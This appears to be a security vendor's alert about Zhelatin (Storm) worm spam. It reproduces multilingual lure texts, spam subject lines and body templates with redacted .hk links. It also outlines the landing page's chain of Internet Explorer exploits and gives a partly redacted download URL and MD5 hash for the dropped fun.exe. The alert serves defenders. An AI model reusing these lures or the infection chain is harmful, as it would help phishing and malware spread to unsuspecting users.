het voor yah, doend beeldverhaal van mijn leven lol..

Italian version:

le mie foto calde :p

German version:

meine hei en Fotos ! :p

Spanish version:

mis fotos calientes
mi fotografas :p
Mi amigo tom las fotos agradables de m
el lol mi hermana quisiera que le enviara este album de foto

Read the detailed report by our analyst Moonny about this worm.

More Zhelatin.eu spams

Today, we received updates on a new variant of “Email-Worm.Win32.Zhelatin.”

The spam bodies contain links to multiple “.hk” domains.

So far we have collected 26 different “.hk” domains, and currently most of them are active.

In the subject of these spams you can see the following words:

Gday, Good day!, Hello, Hey, Hi, Miracle of Love, etc.

The emails contain multiple links. When a user clicks one, it opens a malicious site.

The page serves exploits for several vulnerabilities (MS05-052, MS06-014, MS06-072 and MS07-017) and downloads some “.exe” files. These “.exe” files are variants of “Email-Worm.Win32.Zhelatin.”

Kaspersky antivirus identifies it as “Email-Worm.Win32.Zhelatin.eu.”

Internet Explorer users are receiving lots of this spam, which is why we decided to issue this alert.

The spam looks like this:

Subject:

For You….My Love
Gday
Gday, Bud
Gday, Pal
Good day!
Hello
Hello, Bud
Hey
Hey, Bud
Hey, Pal
Hi
Hi, Bud
Hi, Pal
Memories of You
Miracle of Love
Path We Share
Re:

Body:

The body contains one of the following messages:

A Toast My Love
http://<blocked>.hk/

If an efficient algorithm can be found for obtaining p and q for any
given n, the system will fall apart.

check it
http://<blocked>.hk/

check this
http://<blocked>.hk/

Dream of You
http://<blocked>.hk/

And it struck me that what I saw in Legoland were nothing but sculptures.

just for you
http://<blocked>.hk/
just look
http://<blocked>.hk/

look
http://<blocked>.hk/

look it
http://<blocked>.hk/

look this
http://<blocked>.com/

lol
http://<blocked>.hk/

read
http://<blocked>.hk/

read it
http://<blocked>.hk/

read this
http://<blocked>.hk/

this is for you
http://<blocked>.hk/

You’re In My Thoughts
http://<blocked>.hk/

In all cases, your site needs to look good, and in all cases, your site
needs to function properly.

You’re the One
http://<blocked>.hk/

When a user opens one of the above links, they land on an “index.html” page containing the following code:

CLSID:EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F

This is, in fact, the MS05-052 vulnerability.

The next part of the page loads four “.htm” files: exp1.htm, exp2.htm, exp3.htm and 123.htm.

“exp1.htm” exploits MS06-014;

“exp2.htm” exploits MS06-014 and MS06-072;

“exp3.htm” exploits the Microsoft Internet Explorer WebViewFolderIcon vulnerability.

At the bottom of the page, a file “fun.exe” is downloaded from the following link:

http://z<blocked>y.hk/fun.exe

The file size is 8,021 bytes.

It has the following MD5 hash:

b2fa5d9287cdc2a4e96fb2dcab99021a
